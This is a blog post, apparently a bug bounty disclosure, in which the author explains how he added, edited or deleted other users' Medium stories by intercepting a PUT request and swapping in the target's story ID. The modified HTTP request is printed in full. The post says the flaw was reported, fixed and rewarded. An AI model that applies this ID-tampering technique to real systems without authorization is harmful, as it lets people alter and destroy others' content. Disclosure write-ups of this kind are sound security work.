Allan Jay Dumanhug

@ajdumanhug

Update and Delete any Story of any user on Medium

Before the end of this year, Two well-known people was hacked. Mark Zuckerberg (CEO) of Facebook and Sundar Pichai (CEO) of Google and I was thinking what if it’s time for me to hack Barack Obama. But, I know that isn’t easy.

So, I decided to use my big brain to think my way out!
Looking for a new angle… Then, I found the “Request Story” button hiding in the ‘ellipsis’ or ‘more’ icon.

But, there’s a problem. They, need to approve my request to add their story into my publication and that’s absolutely impossible. But apparently, I can add my own story into my publication without further ado.

First step of adding a story to publication.
Second and Last step is to choose a publication where you want to add the story.

My goal here is to add any story of another user into my publication without their consent and I did that using the “Add story to publication” button.

While I’m adding my own story to my publication, I intercepted the HTTP Request to modify the story ID.

My Story ID: 2a4b6810c12d
Story ID of the target: 1a3b579c101a

The HTTP Request:

PUT /testphzxc/2a4b6810c12d HTTP/1.1
Host: medium.com
Connection: keep-alive
Content-Length: 25
Accept: application/json
Origin: https://medium.com
X-XSRF-Token: {Redacted}
X-Obvious-CID: web
User-Agent: {Redacted}
Content-Type: application/json
Referer: {Redacted}
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,nb;q=0.6
Cookie: {Redacted}
{“postStatus”:”APPROVED”}

In the line where the PUT method is located, you will see the ID of my story. And I will remove that ID and put the ID of the target’s story.

Updated HTTP Request:

PUT /testphzxc/1a3b579c101a HTTP/1.1
Host: medium.com
Connection: keep-alive
Content-Length: 25
Accept: application/json
Origin: https://medium.com
X-XSRF-Token: {Redacted}
X-Obvious-CID: web
User-Agent: {Redacted}
Content-Type: application/json
Referer: {Redacted}
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,nb;q=0.6
Cookie: {Redacted}
{“postStatus”:”APPROVED”}

Of course, like what I’ve just mentioned above, the story will automatically added to my publication without their consent. That is because of:

{“postStatus”:”APPROVED”} 

Then *Poof*. The Target’s story was added to my publication.

Now What? Because the story was added to my publication, I am now able to edit his/her story or delete it.

Well, instead of attacking Mr. Obama’s blog, I reported it to Medium
They fixed it and rewarded me with a $250 bounty but I want more because I found multiple bugs in my report. First, Bypass the Request Story and Two, Update and Delete any story. Then, they added the previous bounty with a $100 bounty for a total of $350 bounty.

More by Allan Jay Dumanhug

Topics of interest

More Related Stories